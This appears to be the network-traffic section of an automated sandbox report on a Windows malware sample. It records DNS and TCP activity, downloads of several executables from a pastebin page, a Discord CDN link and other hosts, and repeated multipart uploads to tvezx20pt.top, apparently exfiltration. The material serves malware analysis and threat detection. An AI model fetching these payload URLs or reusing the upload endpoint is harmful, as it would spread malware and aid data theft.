Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
58yongzhe.com | 62.133.62.93 | |
yip.su | 104.21.79.77 | |
pastebin.com | 172.67.19.24 | |
cdn.discordapp.com | 162.159.133.233 | |
tvezx20pt.top | 77.232.42.234 |
- TCP Requests
-
-
192.168.56.103:49164 104.21.79.77:443yip.su
-
192.168.56.103:49169 104.21.79.77:443yip.su
-
192.168.56.103:49172 162.159.135.233:443cdn.discordapp.com
-
192.168.56.103:49163 172.67.19.24:443pastebin.com
-
192.168.56.103:49166 172.67.19.24:443pastebin.com
-
192.168.56.103:49168 194.58.114.223:80
-
192.168.56.103:49171 62.133.62.93:8058yongzhe.com
-
192.168.56.103:49180 77.232.42.234:80tvezx20pt.top
-
192.168.56.103:49202 77.232.42.234:80tvezx20pt.top
-
192.168.56.103:49207 77.232.42.234:80tvezx20pt.top
-
192.168.56.103:49167 91.121.59.207:80
-
192.168.56.103:49170 91.121.59.207:80
-
- UDP Requests
-
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:56613 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:50803 239.255.255.250:1900
-
GET
0
https://pastebin.com/raw/E0rY26ni
REQUEST
RESPONSE
BODY
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
GET
403
https://yip.su/RNWPd.exe
REQUEST
RESPONSE
BODY
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Sat, 17 Aug 2024 13:13:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: n/sGuqd0Cy6hGoUYBFX5utBcSXSkGUHgRCmaSe4sONqrXL8h971Y++tIWk2cDcaktyxjZ1xS3TmWniXcF+d09i80d4ClO2f1dPDVcW6M4KI=$0yOO2wJ+nro5mnsTD2YysA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tTLFx2a%2FgEkCqm37SH1xbBxRMrsXjRmzAKcoaH5aSGa3lKv1usi4krtJXWeYgHhfDGnvlbDxRb4TJk9D9IrF7xpcRASRjfhiWmeP04c2JLpUi8EiLA8XbtI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49eb62f8883173-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&
REQUEST
RESPONSE
BODY
GET /attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:05 GMT
Content-Type: application/x-msdos-program
Content-Length: 7601622
Connection: keep-alive
CF-Ray: 8b49eb6348cd8b5e-ICN
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 3259
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "45a96ed03c6c80865fd53dc008908681"
Expires: Sun, 17 Aug 2025 13:13:05 GMT
Last-Modified: Sat, 17 Aug 2024 11:59:04 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1723895944594477
x-goog-hash: crc32c=46TzuA==
x-goog-hash: md5=Ralu0DxsgIZf1T3ACJCGgQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7601622
x-guploader-uploadid: AHxI1nNDp89N3DuWlpEuw8Y_zGKiUQGznU7M-C3AUc0AYesDZh4eG1zK_DUpC07514OBm87rFAQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=GSL_.ZE0RlPSK7oWIBCYiQwJqfK.C5QV.MGIY_zaBng-1723900385-1.0.1.1-0Pyyjp_icNe2qP6_CpwUo.g0CJUxEzq3qkNNvz8whpsE9k7xG27m1xC5pCdDjBWDiU2bTZIXtLcAqZztJAOb3w; path=/; expires=Sat, 17-Aug-24 13:43:05 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JskCdSJUqPGheemol0QabKKaJaZIe5iqjMU34PCIR5F84v1EGsmh8GhYnPT0Khf5iVB67eqze0FhNrTWHhPZlkQLAV7ca9G6Fo95b1Q4gO16kQPFIU21OFuF8KVkRyo8EzxG4w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=k7IrHkX6HNPcuKqYU4RIQb.dTWkMyET3fNgr3oSXlFs-1723900385892-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
GET
200
http://91.121.59.207/Files/Channel1.exe
REQUEST
RESPONSE
BODY
GET /Files/Channel1.exe HTTP/1.1
Host: 91.121.59.207
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 16 Aug 2024 19:24:53 GMT
ETag: "651af0-61fd1e9ec45c4"
Accept-Ranges: bytes
Content-Length: 6626032
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
302
http://194.58.114.223/d/385104
REQUEST
RESPONSE
BODY
GET /d/385104 HTTP/1.1
Host: 194.58.114.223
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 17 Aug 2024 13:13:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/1272578305203110022/1274336696627892317/setup.exe?ex=66c1e208&is=66c09088&hm=d301fab09c009c8ddf7bbdaccf84e9e284b1d644909338534cae1eab5b7ee0ef&
GET
200
http://91.121.59.207/Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe
REQUEST
RESPONSE
BODY
GET /Files/6ec431703915b7c3a66be6ef8e2bf8f9.exe HTTP/1.1
Host: 91.121.59.207
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:05 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sat, 17 Aug 2024 11:18:28 GMT
ETag: "1bb066-61fdf3c309735"
Accept-Ranges: bytes
Content-Length: 1814630
Content-Type: application/x-msdownload
GET
200
http://58yongzhe.com/parts/setup1.exe
REQUEST
RESPONSE
BODY
GET /parts/setup1.exe HTTP/1.1
Host: 58yongzhe.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:13:06 GMT
Server: nginx/1.26.1
Content-Type: application/x-dosexec
Content-Length: 265728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
POST
200
http://tvezx20pt.top/v1/upload.php
REQUEST
RESPONSE
BODY
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary39477433
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: tvezx20pt.top
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:38 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST
200
http://tvezx20pt.top/v1/upload.php
REQUEST
RESPONSE
BODY
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary23686319
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 67008
Host: tvezx20pt.top
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:51 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST
200
http://tvezx20pt.top/v1/upload.php
REQUEST
RESPONSE
BODY
POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary13498587
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 19003
Host: tvezx20pt.top
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 17 Aug 2024 13:13:56 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: close
ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49163 172.67.19.24:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | e3:4a:2e:16:cc:2b:72:f6:c5:22:3e:52:49:b3:50:2a:1b:85:6f:8b |
TLS 1.2 192.168.56.103:49164 104.21.79.77:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49166 172.67.19.24:443 |
None | None | None |
TLS 1.2 192.168.56.103:49169 104.21.79.77:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49172 162.159.135.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
Snort Alerts
No Snort Alerts